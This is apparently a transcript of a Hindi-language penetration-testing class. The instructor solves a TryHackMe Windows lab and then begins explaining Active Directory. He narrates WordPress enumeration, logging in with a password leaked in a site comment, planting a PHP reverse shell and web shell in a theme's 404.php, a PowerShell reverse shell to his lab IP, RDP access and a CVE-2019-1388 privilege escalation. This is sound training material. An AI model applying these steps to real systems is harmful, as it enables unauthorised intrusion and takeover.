स्क्रीन विजिबल है? तो TRY हैक मी, लॉगिन कर लेते हैं यहाँ पे। कितने का डिस्काउंटेड वाउचर? किस चीज़ का? जी डिस्काउंटेड वाउचर कितने का है? कौन सा वाला? जो आपने डाला था कोई सिटी का? ये नहीं पता, मोहित सर ने बोला लगाओ इसको, मैं बोला सर नंबर सेव नहीं करता उसको, उनकी बोला लगाओ, हम लोग देखेंगे कैसे थे तो नंबर सेव नहीं है। और बोले टीम से भी लगाओ। ठीक है, VPN कनेक्ट कर लेते हैं पहले। मशीन स्टार्ट कर लेते हैं। तो हमारे पास IP एड्रेस आ चुकी है, उसको हम कर लेते हैं nmap। तो दो पोर्ट इसमें ओपन है ना, AT और AD ओपन है, यानी कि HTTP और हमारा RDP। तो AD पोर्ट पे चेक करते हैं क्या है हमारे पास। नॉर्मल वेब पेज है, यहाँ पे इसको कॉपी करेंगे,
और हम इसको यूज़ कर लेते हैं गोबस्टर के साथ या फिर फेरोक्स बस्टर के साथ। तो लिखेंगे फेरोक्स बस्टर -u URL -w वर्ड लिस्ट डिस्कवरी वेब कंटेंट राफ स्मॉल वर्ड्स डॉट टेक्स्ट। ठीक है, एंटर कर लेते हैं। हेलो, हाँ जी सर, हाँ जी, नहीं सर, कुछ भी कोटेशन नहीं हुई, आज ही मेल आया था एक्चुअली। यहाँ पे एक रेट्रो नाम का फोल्डर है ना, कनेक्ट करा रेट्रो नाम के फोल्डर पे जाते हैं। कि इनकी रिक्वायरमेंट्स टोटल है क्या, मतलब प्रॉपर इनकी रिक्वायरमेंट्स पता नहीं है, तो अभी जब रिक्वायरमेंट्स पता लग जाएंगी पूरी उसके अकॉर्डिंग मैं कोटेशन शेयर करूँगा। तो यहाँ पे हमें वेब पेज मिला है, ठीक है ना। इस वेब पेज को चेक करते हैं किससे बना हुआ है। तो हम वेबलाइजर यूज़ कर सकते हैं ताकि हम चेक कर सकें किस पे बना है। तो ये वर्डप्रेस पेज हमारा दिख रहा है, वर्डप्रेस पेज है। तो जब भी आपको वर्डप्रेस मिले तो आपको क्या करना है, वर्डप्रेस का एक स्कैनर होता है जिसे कहते हैं WP स्कैन। सॉक का पार्ट है, सॉरी स्काडा नहीं है सर, वो मॉनिटरिंग वाला सॉक का पार्ट है सर। हाँ वो दूसरा था वो। ठीक है, तो यहाँ पे WP स्कैन करेंगे हम, जो कि वर्डप्रेस स्कैनर होता है। हाँ जी सर, वो वाला पार्ट है। हाइफन URL स्पेस URL पेस्ट कर देंगे यहाँ पे। वो मोबाइल का भी है, वेब का पार्ट भी और है। हम यहाँ पे इनुमरेट करेंगे अपना यूजर्स नेम और प्लगइन्स। तो यू आपका यूजर नेम फाइंड करने के लिए, P आपका प्लगइन्स निकालने के लिए। एंटर करते हैं। नहीं सर, पॉलिसी ऐसा उसमें है पॉलिसी। हाँ जी, क्रिप्टोग्राफी में वो पार्ट है। यही है। मैं आपको एक बार कंटेंट शेयर कर दूँ सर उसका, मैं आपको कंटेंट शेयर। और बाकी सर वो समर ट्रेनिंग जो होनी है स्टूडेंट्स की, 3rd ईयर के स्टूडेंट्स हैं, तो 125 स्टूडेंट्स का एक बैच बनेगा और 80 to 100 आवर्स का ट्रेनिंग, 80 to 100 आवर्स की ट्रेनिंग होगी। हाँ, 2 आवर्स पर डे का सेशन होगा। सर आपसे बात करी आपने 20,000 बोला, CH APT और वेब प्रोजेक्ट। ठीक है, देखो यहाँ पे स्कैन आ चुका है। यहाँ पे देखो चीज़ें क्या क्या हमें मिली। अगर ऊपर से चेक करोगे यहाँ पे, ये तीनों के ब्रोशरी में कर दूँ जैसे वर्ड। ठीक है। सबसे पहले हमारे पास क्या है, हेडर्स है। जो भी यहाँ पे हेडर्स यूज़ किए जा रहे हैं वेबसाइट पे रिस्पॉन्ड करने के लिए, वो क्या है हमारे पास, हेडर्स है। फिर आपका अगला है XML RPC, यानी कि XML RPC हमारा इस तरह से इंटरेक्शन के लिए होता है सर्वर्स के साथ। तो वो है आपका XML RPC PHP फाइल।
तीसरी हमारे पास वर्डप्रेस की रीडमी फाइल, यानी कि इसमें हमें रीडमी इन्फॉर्मेशन मिल सकती है कि वर्डप्रेस पे क्या चल रहा है। ठीक है, अब इसमें वर्डप्रेस के अंदर क्या होता है, थीम्स होती हैं। थीम्स मतलब जैसे हम कोड लिखते हैं फ़ोन में थीम्स होती है हमारे पास, उसी तरह हम वेबसाइट में भी थीम लगा सकते हैं। तो इसमें जो थीम यूज़ की जा रही है वो है 90s रेट्रो नाम की। ठीक है, उसका वर्जन, जो भी उसका वर्जन होगा वो, उसका रीडमी, कहाँ पे उसकी रीडमी फाइल है, और बाकी उसकी ऑर्गेनाइजेशन इन्फोस। ठीक, फिर प्लगइन्स इसमें कुछ हमें मिले नहीं, लेकिन यूज़र मिला है। एक कौन यूज़र मिला हमें, वेड नाम के, वेड नाम का यूज़र मिला है। ठीक है, सेम नेम है वेड, तो वेड आपका यूज़र है। तो जब आप यहाँ पे वेबसाइट के आगे कॉपी कर लेते हैं URL को, पेस्ट करते हैं, यहाँ लिखते हैं wp-admin, तो ये मेरे को एडमिन पेज पे क्या करेगा, रिडायरेक्ट करेगा। ठीक है, तो देखो ये कहाँ लेके जा रहा है मेरे को, https लोकल होस्ट रेट्रो लॉगिन पेज पे, है ना। तो मेरे को यहाँ पे इसको रिडायरेक्ट करना है। तो कैसे कर सकता हूँ मैं यहाँ पे क्या करूँगा, vim/etc/host के अंदर इस विक्टिम की IP कॉपी करूँगा, मतलब इस अपनी टारगेट मशीन की IP कॉपी करूँगा। ठीक है, और इसके आगे इसको कोई डोमेन का नाम दे, जैसे इसका नाम है रेट्रो, तो मैं लिखूँगा यहाँ पे retro.thm, सेव कर लेते हैं अपनी फाइल को। और जहाँ पे हमारा ये लिख रहा है लोकल होस्ट, यहाँ पे कर देंगे retro.thm, और HTTPS को कर देंगे हम HTTP, क्योंकि वहाँ पे 443 पोर्ट ओपन है ही नहीं, तो आपको लॉगिन पेज यहाँ पे मिल जाएगा। अब हमें जो वेड यूज़र नेम मिला है, वेड लिखते हैं, और कुछ भी पासवर्ड दोगे तो ये शो करेगा आपका वैलिड यूज़र है, क्योंकि पासवर्ड हमारा खाली गलत है। यहाँ पे पासवर्ड यू एंटर फॉर द यूज़र नेम वेड इज इनकरेक्ट, इसका मतलब ये है कि वेड हमारा वैलिड यूज़र है, यानी कि इसका हम पासवर्ड गलत डाल रहे हैं खाली। अगर मैं कोई और यूज़र नेम दूंगा, कोई और पासवर्ड दूंगा, तो यहाँ लिख के आता है इनवैलिड यूज़र नेम, तो वेड हमारा क्या है, वैलिड यूज़र है। ठीक, अब हम क्या करेंगे, हमारा जो वेड का पासवर्ड है वो हमारे वेब पेज पे ही छुपा रहता है। ठीक है, तो वो आपको यहाँ पे इसके कमेंट्स में मिल जाएगा। ये रहा, वन कमेंट फॉर रेडी प्लेयर वन, लीविंग माई सेव अ नोट दैट इन जस्ट केस आई फॉरगॉट टू स्पेल इट पेरिसेबल। पेरिसेबल क्या है, उसका पासवर्ड होता है। तो आपको यहाँ पे वेड लिखना है, और पासवर्ड पेरिसेबल इसको पेस्ट करना, तो आपको लॉगिन पेज यहाँ पे मिल जाएगा। तो लोकल होस्ट जा रहा है, इसको कर लेते हैं wp-retro.thm, और एंटर कर लेते हैं। HTTPS पे तो नहीं चला गया, नेट नहीं चल रहा। नहीं नेट चल रहा है, नेट तो चल रहा है, आ गया, लॉगिन पेज आ गया। ये क्या है, हमारा वर्डप्रेस का पेज है। तो इस वर्डप्रेस के पेज में हम क्या कर सकते हैं, हम मॉडिफाई करके कोई भी PHP फाइल एग्जीक्यूट कर सकते हैं। तो आपको कहाँ जाना है, अपीयरेंस पे जाना होता है, थीम्स पे जाना है। ठीक है, यहाँ पे ये कौन सी यूज़ कर रही है, 90s रेट्रो, है ना। तो 90s रेट्रो वाली को आप क्या करोगे, एडिट करोगे, तो थीम एडिटर पे क्लिक करेंगे। ठीक है, तो आपको यहाँ पे क्या मिलेगा, ये इस तरह का पेज कोड मिलेगा। यहाँ पे देखो कोड के नाम, फाइल के नाम, पेज का नाम, कोड लिखा हुआ है। तो आप यहाँ पे वर्डप्रेस क्या है, हमारा PHP बेस्ड है, तो PHP का कोड हम कुछ भी एग्जीक्यूट करेंगे, ये कोड पेस्ट करके डाल देंगे तो वो बैकग्राउंड में एग्जीक्यूट हो जाएगा। तो मैं यहाँ पे जैसे एक फाइल होती है हमारे पास 404.php, है ना, इस फाइल को क्या करूँगा, एडिट कर दूँगा। किससे करेंगे, हम यहाँ सर्च करेंगे PHP विंडोज़ रिवर्स शेल। ठीक है, तो आप यहाँ से PHP का रिवर्स शेल कॉपी कर सकते हो। ठीक है, ये वाला कम वर्क करता है, लेकिन ट्राई कर लेंगे इसको भी। और रिवर्स शेल एडिटर ये नहीं है,
इसी को ट्राई करते हैं। तो इसके रिवर्सल वाले कोड पे जाएंगे, ये हमारा कोड है, इसको कॉपी कर लेते हैं, वेब पेज पे जाएंगे, यहाँ पे कंट्रोल है, कंट्रोल भी करके उसको चेक पेस्ट कर देंगे, ठीक। फिर यहाँ पे जहाँ पे हमारे आईपी एड्रेस है वहाँ पे हम अपनी आईपी एड्रेस देंगे मशीन की 10.23 10.23.1.67, ठीक है। और हम यहाँ पे पोर्ट्स में अपना कोड देते हैं 444। इतना करने के बाद फाइल को कर देते हैं सेव, अपडेट फाइल। यहाँ अपना नेटकैट स्टार्ट कर लेते हैं, एंटर कर लेंगे। और अब इस फाइल को हमें एग्जीक्यूट करना है। तो इसको एग्जीक्यूट करने कहाँ होता है कि जब आपने WP स्कैन किया था यहाँ पे, तो आपको यहाँ पे इसके कंटेंट्स का फोल्डर का नाम मिला होगा, ठीक है। यहाँ पे आपको देखना है थीम्स के कंटेंट का फोल्डर का नाम दिख रहा है यहाँ पे, HTTP, IP एड्रेस, रेट्रो, वर्डप्रेस, थीम्स, स्टाइल, है ना। तो यहाँ पे आपको पूरा आना है, इतना इसको कॉपी करना है और इसके आगे जाके WP रेट्रो थीम्स का नाम और उसके आगे 404.php करके कॉल कर लेना है, एंटर करना है। तो आपको अगर वो वेब पेज होगा, एग्जीक्यूट होगा तो दिखेगा। तो यहाँ पे ये एग्जीक्यूट हुआ कि नहीं हुआ ये नहीं पता, लेकिन शो तो नहीं हुआ। रिफ्रेश कर लेते हैं। सर इसमें थीम मिसिंग है। नहीं है ना, तो इसका नाम, थीम का नाम, इतनी लोकेशन होती है ना खाली। तो ये नहीं है, तो एक काम करते हैं, PHP कमांड शेल विंडोज, ठीक है। ये वाला डाला था, वहाँ ट्राई करते हैं एक बार एडिट करके। इस वजह से हो रहा है, एक सेकेंड। और यहाँ पे पोर्ट है 444। ठीक है, फाइल अपडेट हो चुकी है। अब वहाँ पे हम अपनी फाइल को रिफ्रेश करके देखते हैं एक बार। ठीक है, अब हो चुका है। सी विंडोज 10 में ये पोर्ट 444 इसमें एरर क्यों आ रहा है? वो बताया तो, कॉपी पेस्ट करने में दिक्कत हुई है ना। वेट करते हैं हमारे नेटकैट से लाने का, उसको एग्जीक्यूट करेगी।
सर ये काफ़ी टाइम में आता है नाइट कैट का शेयर। विंडोज़ में लेट आता है कभी एग्जीक्यूटिंग लिख के ना डिफ़ॉल्ट शेल 4441367 पोर्ट चेंज करके देखते हैं। यहाँ पे पोर्ट कर देते हैं, यहाँ पे एक बार 80 कर देते हैं। अरे यार फिर वही दिक्कत, तो यहाँ 80 करके देखते हैं। ठीक है, यहाँ पे स्टार्ट करते हैं 80 पे। फोर वाली फाइल रिफ्रेश, देखते हैं 80 पे। ये एग्जीक्यूट नहीं हो पा रही अभी, 2 मिनट रुक लेते हैं, आ जाएगा। इसको भी ट्राई करके देख लेते हैं। फोर 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 पे नहीं जा रहा शायद हमारा 23167। सो टू सपोर्ट, हाँ देखो यूनियन नॉट रिकॉग्नाइज, मतलब ये PHP रिवर्सल सही है, लेकिन हमारा यूनियन कमांड की वजह से फाइल में दिक्कत है। हम एग्जीक्यूट कर पा रहे हैं, लेकिन हमें प्रॉपर रिवर्स शेल चाहिए जो विंडोज़ पे चले। ठीक है, तो हमें कोई विंडोज़ वाला शेल चाहिए वाला, चलना तो यही चाहिए, लेकिन हाँ नहीं। पावर कैट है, ये नहीं चाहिए हमें, पावर कैट नहीं चाहिए भाई। एग्जीक्यूट नहीं हो रही।
ठीक है, इसको डाल देते हैं पवनी शेल को। ठीक है, तो पवनी शेल अपलोड कर देंगे तो हमें वहाँ पे एक वेब पेज पे ही कमांड एग्जीक्यूट करने का हमें वो मिल जाएगा। ट्राई करते हैं। अपडेट फाइल, ठीक है, पेज को रीलोड करते हैं तो यहाँ पे हमें देखो शेल यहाँ पे पेज पे ही मिल रहा है। ठीक है, कमांड एग्जीक्यूट करके देखते हैं हुए माए, तो काम हमारा कर रहा है, लेकिन थोड़ा वो दिखा रहा है आपको, एक्सेस दिखा रहा है, गलत आ रहा है, मतलब फॉर्मेट में दिक्कत है। तो आप यहाँ पे क्या कर सकते हो, आप जैसे यहाँ पे चेक करना है कि आप ये पावर शेल चल रहा है या फिर CMD चल रहा है, तो जैसे यहाँ पे LS लिखोगे तो एरर देना चाहिए अगर ये, क्योंकि ये क्या है CMD। अगर DI आ रहा था तो हमारा चल जाता, डायरेक्टरी में शो करता। तो हम यहाँ पे विंडोज़ रिवर्स शेल किस पे अब आ सकते हैं, पावर शेल नहीं revshells.com पे, है ना, और यहाँ से हम पावर शेल वाला पेलोड कॉपी कर सकते हैं। तो विंडोज़ नीचे आएंगे पावर शेल पे, base64, यहाँ पे हम अपनी IP दे देते हैं 23167, पोर्ट नंबर 444, कॉपी कर लेते हैं। ठीक है, और यहाँ पे हमारा 444 पे चालू कर लेते हैं वापस से नेटकैट, और अपनी हम शेल पे जाएंगे, पेस्ट करेंगे, कॉपी नहीं हो रहा, कॉपी विंडोज पवनी शेल, पेस्ट, एंटर, और चेक करते हैं हमारे पास आया एक्सेस, नहीं आया। इसमें एक्सेस तो नहीं दिखा रहा मेरे को, डायरेक्ट आ चुका है, आ गया, लेट आता थोड़ा। तो अब यहाँ पे आप कोई भी कमांड चलाओगे तो ऐसे पावर शेल वो रन करेगी, है ना। तो ये आपके पास अभी क्या आ चुका है, एक्सेस आ चुका है उसके सिस्टम का। ठीक है, तो यहाँ से आप पहला फ्लैग फाइंड कर सकते हो, जो कि आप C वगैरह किसी यूज़र पे होगा, तो CD यूज़र्स LS आवाज़ आ रही है ना आपको मेरी? चलिए आवाज़ वो भी चली है, ठीक है। ब्रेक होती है बीच बीच में कभी कभी। हाँ, वो नेट की वजह से होगा, चेंज कर, इससे XDR से तो कनेक्टेड है। तो कमांड चलना बंद हो चुके हैं, इसका मतलब मशीन एक्टिव है। तो एक चीज़ और ट्राई कर सकते हो आप इसका डायरेक्ट एक्सेस लेने की ट्राई करो जो हमें क्रेडेंशियल में है। जैसे कि हम RDP एक्सेस ले लेते हैं इसका, जो हमें यूज़र क्रेडेंशियल्स मिले, ये वेड और पेरिसेबल। तो हम यहाँ लिखेंगे R डेस्कटॉप, ठीक है, -U, यूज़र नेम हमारा क्या था, वेड, -P हमारा पासवर्ड जो कहता है पेरिसेबल करके कुछ था, ये है ना। तो इसको ट्राई करते हैं हम RDP एक्सेस लेने के लिए, -I
और जो मशीन की आईपी एड्रेस है वो। एंटर करेंगे तो -v ऑप्शन, तो मैं इसको यूज़ कर लेता हूँ। एंटर वाई, तो जो हमारा वेड यूज़र है वो सेम हमारे विंडोज़ पे भी प्रेजेंट है ना। तो मेरे को क्या मिल रहा है, वहाँ पे एक एक्सेस मिल रहा है। तो यहाँ पे इसका पहला फ्लैग आपका user.txt ये रहा, आप इसको कॉपी पेस्ट करके अपना पहले फ्लैग को सबमिट कर सकते हैं यहाँ पे, ठीक है। अब हमें चाहिए रूट फ्लैग, हमें क्या करना है, प्रिविलेजिएशन करना है। तो यहाँ पे जब आप प्रिविलेजिएशन करने जाओगे तो आपको कई चीज़ मिलेंगी। जैसे कि आप एक चीज़ ट्राई कर सकते हो डैट कि आप इसमें विन पीस रन करो। विन पीस जो प्रिविलेजिएशन रजिस्टर था हमारा वो, तो उसके लिए आपको क्या करना पड़ेगा, हमारे पास वो पहले से इंस्टॉल, तो यूज़र शेयर पीस विन पीस, इस पे आना पड़ेगा। और यहाँ पे जो ये विन पीस 64 बिट वाली फाइल है, इसको आपको विक्टिम की मशीन में ट्रांसफ़र करना पड़ेगा। तो आप यहाँ पे पाइथन यूज़ कर सकते हो या फिर आप SMB सर्वर क्रिएट कर सकते हो, जो आपको अच्छा लगे। जैसे हम यहाँ पे यूज़ कर लेते हैं इम्पैकेट SMB सर्वर। लेकिन ये चलेगा नहीं क्योंकि विक्टिम की मशीन पे क्या है, आपका SMB सर्वर इनेबल नहीं है, ठीक है। ट्राई करने में दिखा देता हूँ आपको, ठीक है। तो जैसे मैं यहाँ पे जाता हूँ, यहाँ पे विंडोज़ मशीन इसका टर्मिनल ओपन करते हैं, पावर से ओपन करते हैं। ठीक है, यहाँ पे लिखेंगे कॉपी /10.23.1.67/kali/win piece x64.exe और win piece x64.exe। एंटर करेंगे तो कनेक्शन तो मेरे पास आया, लेकिन क्या दिखा रहा है, इट डज़ नॉट एग्जिस्ट, फाइल में कोई दिक्कत है। तो कॉपी करता हूँ मैं नेम फाइल का, यहाँ पे हो गया। दोबारा से इस कमांड पे जाते हैं, ठीक है, एंटर कर लेते हैं। कॉपी नहीं हो रही है लगता है।
ठीक है, कॉपी हो गई फाइल, यहाँ पे चेक कर लेते हैं। तो देखो यहाँ पे विन पीस वाली फाइल आ चुकी है। तो ./ करके इसको मैं नेम पेस्ट करके रन करूँगा तो ये सिस्टम को पूरा स्कैन करेगा यहाँ पे क्या क्या हमारी वल्नरेबिलिटीज़ हैं। ठीक है, ठीक है। आप यहाँ पे ऊपर से चेक करते हैं इसमें क्या क्या है। ठीक है, तो सबसे पहली चीज़ हमें जो मिली है यहाँ पे वो है यहाँ पे इसकी इन्फॉर्मेशन, जैसे कि इसके ओएस का वर्जन क्या, सर्वर है, सर्वर यूज़ कर रहा है 2016 का, है ना, x64 बेस्ड है, AMD वर्जन, रिलीज आईडी वगैरह वगैरह। फिर यहाँ पे इसका क्या है, ये इन्वायरमेंट वेरिएबल्स, तो कंप्यूटर का नाम, सेशन का नेम, यूज़र नेम, वेट, क्लाइंट नेम काली जो हमारा कनेक्टेड है। ठीक है, फिर यहाँ पे इसके अदर इन्वायरमेंट सिस्टम की मेन वेरिएबल्स हैं यहाँ पे। फिर हमारे पास LAPS जो सर्विस LDAP के अंदर होती है वो इनेबल्ड नहीं है। LSA प्रोटेक्शन, क्लाइंट क्रेडेंशियल गार्ड इज़ नॉट इनेबल्ड, कैश लॉगिंग इज़ नॉट इनेबल्ड, नो एंटीवायरस डिटेक्ट, यानी कि इसमें कोई एंटीवायरस नहीं लगा हुआ। और पावरशेल की हिस्ट्री फाइल इसमें कहाँ पे है, ये PS हिस्ट्री फाइल आपकी पावरशेल की हिस्ट्री फाइल की लोकेशन। और हमारे पास क्रिएटिंग डायरेक्टरीज का वो है, NTLM वर्जन 2 रिस्पॉन्स हमारे पास अपने यूज़र का। सर इसमें हमें फाइंड क्या करना है? जो रेड में है ना उन सबको चेक करना है। जैसे यहाँ पे अपेंड डेटा जो हमने विंडोज़ प्ले स्टेशन की लैब में करा था ना, सारी चीज़ें फाइंड करनी है उसमें हमें। तो विन पीस हाईजैकिंग फोल्डर वेड, है ना, नॉर्मल चीज़ें सारी यहाँ पे। फिर एक लाइट एजेंट है यहाँ पे अमेज़ोन का, अमेज़ोन की तरफ से है। अब जैसे दिखा रहा है यहाँ पे पाथ इंजेक्शन, तो हम इन रजिस्ट्री लोकेशन पे पाथ इंजेक्शन क्रिएट कर सकते हैं। यहाँ पे रेड में लिख रहा है ना, तो इन पे हम पाथ इंजेक्शन ट्राई कर सकते हैं। यहाँ पे देखो अनकोटेड स्पेस डिटेक्टेड दिखा रहा है ना, इंटरनेट एक्सप्लोरर में। और हमारे पास स्टार्टअप ऐप्स हैं यहाँ पे कुछ। AWS की एक्सेस की आईडी है ये। हाँ, यहाँ पे क्रोम यूज़ किया जा रहा है, तो क्रोम में कोई कुकीज़ है ब्राउज़र हिस्ट्री पे, वो चेक करने को उसने कहा है ना। और हमारे पास इसमें ज़्यादा कुछ हमें मिला नहीं है, तो क्रोम से ही स्टार्ट करते हैं। तो इसको मिनिमाइज़ कर लेते हैं और यहाँ पे क्रोम को ओपन करते हैं। तो यहाँ पे आपके जो हिस्ट्री है वो दिखा रहा है, यहाँ पे कोई NVD CV को ओपन किया था इसने। तो CV इसने यूज़ किया 20191338। कॉपी करते हैं इसको और चेक करते हैं क्या है। तो यहाँ पे दिख रहा है पेडिस्ट्रेशन की वल्नरेबिलिटी है ना। तो यहाँ पे हम लिखेंगे एक्सप्लॉइट गिटहब। तो हमें अब्यूज UAC सर्टिफिकेट अथॉरिटी सिस्टम पेडिस्ट्रेशन वल्नरेबिलिटी, है ना, अलग अलग चीज़ दिख रही है, तो इनको ओपन कर लेते हैं।
तो यहाँ पे हमें क्या करना है, फाइंड प्रोग्राम दैट कैन ट्रिगर यूएससी प्रॉम्प्ट स्क्रीन शो मोर डिटेल्स यू विल हैव एक्सेस टू द कमांड प्रॉम्प्ट। तो हमें करना क्या है, right click on this see more details, then click on show certificate, CA certificate, certificate version, system 32। अच्छा उस तरह वाला है जो, याद करो हमने एक पेंट के साथ किया था प्रिस्क्रिप्शन, पेंट के अंदर जाके CMD ओपन किया था, उस तरह से करना है हमें। तो इसके लिए हमें कोई सर्टिफिकेट वो चाहिए। तो हम यहाँ पे क्या करेंगे कि किसी प्रोग्राम को हमें जाना पड़ेगा प्रॉपर्टीज़ में, प्रॉपर्टीज़ से मेरे को कोई यूएससी फाइल चाहिए। पहले यूएससी फाइल कहाँ मिलेगी हमें, ये रही SUPPD करके इसको रिस्टोर करते हैं, है ना, और यहाँ से इसको रन करते हैं। सी मोड पे गए, पब्लिश सर्टिफिकेट, सर्टिफिकेट यहाँ से मेरे ख्याल से इसको खोलना है, यहाँ से किसको खोलना था, ये आ जाना चाहिए इसके बाद। तो ब्राउज़र इंटरफेस, सेव एज, ठीक है, सेव एज करना है। तो इसे मैं यहाँ पे क्रोम को ही खोलता हूँ, ओपन, कंट्रोल एस करके देख लेते हैं, सेव एज। अभी आया नहीं है, अभी वो प्रोसेस में चलेगा, इतना ही हाँ। है हमने। ये रहा। यहाँ पे राइट क्लिक करके सेव एज पे करेंगे, और यहाँ से मैं CMD अगर ओपन करता हूँ तो ये एडमिनिस्ट्रेटर की ओपन हो रही है, दिख रही है। अब यहाँ से मैं C यूजर्स पे जा सकते हैं, dir, तो एडमिनिस्ट्रेटर, डेस्कटॉप, dir, एंटर। तो टाइप root.text, एंटर। सो ये हमारा फ्लैग, कॉपी नहीं होगा। हो जाएगा कॉपी। ठीक है, यहाँ से ये पेस्ट हो जाएगा, क्या। तो इस तरह से क्या कर सकते हैं हम, पाथ को यूज़ करके CMD ओपन करके एडमिन एक्सेस ले सकते हैं, है ना। तो ये थी आपकी रेट्रो मशीन। ट्राई कर लीजिए इसको जल्दी से आप। सब लोग इसको ट्राई कर लीजिए, फिर बताता हूँ आपको। नेक्स्ट मशीन देखते हैं, सर एडी एडी करेंगे।
कमांड कौन सी वाली? सर लॉगिन का कौन सी? लॉगिन को सर टेक्स्ट हो अच्छा RDP वाली, ये लो, ये रही कमांड। हमसे नीचे ये फोन अच्छा हो गया। करके नाम लिख दो। बंद कर दो।
हो गया आप लोग का? अगला देखें। चांदी बढ़िया वहाँ पे। हैं? चांदी बढ़िया। हाँ नो वैसे रिस्पॉन्स मंगाया था चांदी की। सब सो गए। बढ़िया एकदम। चांदी की ना। हेलो, आईटीसी का चक्कर बंद कर, या तो ऑफलाइन या ऑनलाइन। मैं नहीं कर सकता कुछ। अगला देखें, आगे देखें। यस सर। ठीक है। ठीक है, अगला टॉपिक स्टार्ट करते हैं। हमारा जो है एक्टिव डायरेक्टरी। ठीक है, देखो एक्टिव डायरेक्टरी क्या होती है पहले वो समझते हैं। ठीक है, आप ऐसा समझिए कि आप एक कंपनी के अंदर वर्क करते हो और कंपनी के अंदर मल्टीपल यूज़र्स हैं और मल्टीपल ग्रुप्स हैं, यानी कि काम करने वाले अलग अलग लोग हैं, डिपार्टमेंट्स बटे हुए हैं। जैसे कि आपका एचआर डिपार्टमेंट, आपका सेल्स डिपार्टमेंट, आपका ट्रेनर्स डिपार्टमेंट, आपका एग्जीक्यूटिव डिपार्टमेंट, आईटी डिपार्टमेंट, अलग अलग। तो सबके पास एक एक पीसी होना चाहिए, सबके पास अलग अलग परमिशंस होनी चाहिए, सबके पास अलग अलग डेटा होना चाहिए। तो उन सब चीज़ों को डिवाइड करने के लिए हम एक ऐसा मैनेजमेंट क्रिएट करते हैं, ऐसा नेटवर्क क्रिएट करते हैं जिससे एक डिपार्टमेंट वाला दूसरे डिपार्टमेंट को डेटा शेयर कर सके और उसकी परमिशंस को बिना लिए, बिना एक्सेस करे, यानी कि उसकी लिमिटेड परमिशंस को यूज़ करें, हम उसमें कर सकते हैं। जैसे कि अगर मान लीजिए मेरे पास 5 ग्रुप है, 1 2 3 4 5 और एक 6 ले लेते हैं। ठीक है, ये तुम्हारा मेन है एचआर डिपार्टमेंट, ये तुम्हारा है आईटी डिपार्टमेंट, ये है तुम्हारा सेल्स डिपार्टमेंट और ये है तुम्हारा मैनेजमेंट। ठीक है, ये है तुम्हारा स्टाफ और इसको ले लेते हैं हम एज अ अकाउंटेंट। ठीक है, अब होता क्या है कि मान लीजिए जो आईटी डिपार्टमेंट वाले बंदे हैं, जो भी वहाँ पे काम करते हैं, उनको क्या मैनेजमेंट से मतलब है? नहीं है। उनको क्या स्टाफ और अकाउंटेंट से मतलब है? उनको सेल्स वाले से मतलब है? नहीं है। ठीक है, एचआर से। हाँ, उसको सिर्फ एचआर से मतलब है, बाकी अदर जो अकाउंटेंट डिवाइस वाले से मतलब है उससे। ठीक, यही सेम चीज़ मैं अगर करूँ सेल्स पे, यानी कि सेल्स वाला बंदा, सेल्स वाले जो बंदे हैं उनको मैनेजमेंट से कोई मतलब नहीं है, उनको सिर्फ एचआर से मतलब है, उनको सिर्फ अकाउंटेंट से मतलब है ना। स्टाफ से भी उन्हें कोई मतलब नहीं है, क्योंकि सेल्स वालों को अकाउंटेंट को अपना पूरा देना पड़ता है चार्ट और मैनेजमेंट वाले उनको मैनेज करके देते हैं। अब लेकिन हमारी जो एचआर ग्रुप होता है उसको किससे मतलब है? सबसे, है ना। यानी कि एचआर ग्रुप हमारा किस पे आना चाहिए? सारे ग्रुप्स को मैनेज करना चाहिए। मेरे को वो बताओ आप। उधर की नहीं, ऊपर की नहीं। है ना। तो जो ग्रुप्स होते हैं हमारे, वो इनको मैनेज करने के लिए बनाए जाते हैं। ठीक है, अब इसी तरह हम डिवाइसेस को डिवाइड करते हैं। जैसे ये ग्रुप्स को डिवाइड किया, अब इसको हम डिवाइसेस के थ्रू डिवाइड करते हैं। कैसे करेंगे? अरे हमारे पास एक पूरा डोमेन होता है। डोमेन, हाँ, कल क्लास ठीक। कैंसिल हुई है उसकी। डोमेन मतलब जो हम वेबसाइट्स में कॉल करते हैं, जैसे कि हमारा craw.in एग्जाम्पल के लिए। ठीक, ये डोमेन क्या करेगा कि मान लीजिए अब आपके पास क्या है कि आपके नेटवर्क है। अब नेटवर्क में डिवाइसेस होते हैं, तो कौन कौन से डिवाइस होंगे? एक हमारा मेन सर्वर होगा, एक हमारे पास फाइल सर्वर होगा, एक हमारे पास नॉर्मल डिवाइसेस यूज़र होंगे, एक हमारे पास डेटाबेस होगा, एक हमारे पास वेब सर्वर या फिर अदर सर्वर होगा। ठीक,
तो इन सब के बीच में क्या होगी, एक डिवाइस से मेन डिवाइस से कनेक्टिविटी होगी जो इसको आपका कनेक्टिविटी और डेटा प्रोवाइड करेगा। मतलब कि उसको कहते हैं हमारा डोमेन कंट्रोलर, डीसी। ठीक, डीसी आपका क्या होता है, डोमेन कंट्रोलर, जो कि आपके नेटवर्क को बाइंड करके रखता है, यानी कि अटैच करके रखता है ताकि अदर डिवाइसेस उससे चीज़ों को ले या दे सकें। ठीक है, एक हमारे पास रिक्वायरमेंट होगी डेटाबेस सर्वर की, एक होगी हमारे फाइल सर्वर की यहाँ पे, फिर एक होंगे आपके नॉर्मल पीसी लैपटॉप्स जो यूजर्स के होते हैं, और एक होते हैं हमारे एंड डिवाइसेस। तो चार चीज़ हमारी मेन होती हैं एक्टिव डायरेक्टरी के अंदर। अदर भी होती हैं, है ना, एलडैप सर्वर अलग हो सकता है, एफटीपी सर्वर अलग हो सकता है, आपका डीएनएस सर्वर अलग हो सकता है, लेकिन आप क्या कर सकते हो, सारी चीज़ें एक ही डिवाइस के अंदर रख सकते हो। उसको कहते हैं हम अपना डोमेन कंट्रोलर। इसको ही आप अपना एचटीटीपी सर्वर बना सकते हो, एफटीपी सर्वर बना सकते हो, आप इसको डेटाबेस सर्वर बना सकते हो, सारी चीज़ें। ठीक है, तो ये क्या होता है हमारा डीसी, इसको कहते हैं हमारा डोमेन कंट्रोलर। तो डीसी हमारा क्या करता है, सर्विसेज, परमिशंस और यूजर्स को असाइन करता है। क्या करता है, यूजर्स, सर्विसेज और परमिशंस को असाइन करता है कि जो डेटाबेस है वो आपका डायरेक्ट पीसी से कनेक्ट होना चाहिए कि नहीं होना चाहिए, कौन देखेगा, डीसी देखेगा। जो फाइल सर्वर है वो डेटा आपका डेटाबेस से लेके किसी को देगा कि नहीं देगा, ये कौन डिसाइड करेगा, डीसी करेगा। एंड डिवाइसेस के पास फाइल सर्वर या डेटाबेस सर्वर का 